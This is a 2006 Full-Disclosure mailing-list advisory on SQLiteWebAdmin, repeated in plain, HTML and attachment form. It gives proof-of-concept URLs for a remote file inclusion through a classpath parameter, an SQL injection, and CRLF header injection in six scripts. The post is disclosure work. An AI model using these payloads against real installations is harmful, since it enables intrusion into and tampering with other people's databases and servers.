[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities
From: SirDarckCat <sirdarckcat () gmail ! com>
Date: 2006-07-30 4:43:39
Message-ID: 8ba534860607292143w7db874fft11bfa8cb7fdbbaba () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Discovered by Sirdarckcat from elhacker.net
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================
SQLiteWebAdmin is a simple script for managing a
DataBase.
It has several security bugs.
==============================================
Remote File Inclusion:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/
?
==============================================
SQLinjection:
PoC:
http://www.server.com/table_editfield.php?table='+[SQL]
==============================================
And also Header Injection:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value
==============================================
Att.
Sirdarckcat
elhacker.net
--
Att.
SirDarckCat@GMail.com
http://www.google.com/search?q=sirdarckcat
[Attachment #5 (text/html)]
<p>Discovered by Sirdarckcat from <a href="http://elhacker.net">elhacker.net</a></p>
<p>SQLiteWebAdmin<br><a \
href="http://sourceforge.net/projects/sqlitewebadmin">http://sourceforge.net/projects/sqlitewebadmin</a><br>==============================================</p>
<p>SQLiteWebAdmin is a simple script for managing a<br>DataBase.</p>
<p>It has several security bugs.</p>
<p>==============================================<br>Remote File Inclusion:</p>
<p><br>PoC:<br><a href="http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google. \
com/">http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/</a>?</p> \
<p>==============================================</p> <p>SQLinjection:</p>
<p>PoC:<br><a href="http://www.server.com/table_editfield.php?table='+[SQL">http://www.server.com/table_editfield.php?table='+[SQL</a>]</p>
<p>==============================================</p>
<p>And also Header Injection:</p>
<p><br>PoC:<br><a href="http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value</a></p>
<p>PoC:<br><a href="http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value">http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value</a></p>
<p>PoC:<br><a href="http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value</a></p>
<p>PoC:<br><a href="http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value">http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value</a></p>
<p>PoC:<br><a href="http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value</a></p>
<p>PoC:<br><a href="http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value">http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value</a></p>
<p><br>==============================================</p>
<p>Att.<br>Sirdarckcat<br><a href="http://elhacker.net">elhacker.net</a></p><br \
clear="all"><br>-- <br>Att.<br><a \
href="mailto:SirDarckCat@GMail.com">SirDarckCat@GMail.com</a><br><br><a \
href="http://www.google.com/search?q=sirdarckcat"> \
http://www.google.com/search?q=sirdarckcat</a>
["sqlitewebadmin.txt" (text/plain)]
Discovered by Sirdarckcat from elhacker.net
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================
SQLiteWebAdmin is a simple script for managing a
DataBase.
It has several security bugs.
==============================================
Remote File Inclusion:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?
==============================================
SQLinjection:
PoC:
http://www.server.com/table_editfield.php?table='+[SQL]
==============================================
And also Header Injection:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value
==============================================
Att.
Sirdarckcat
elhacker.net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic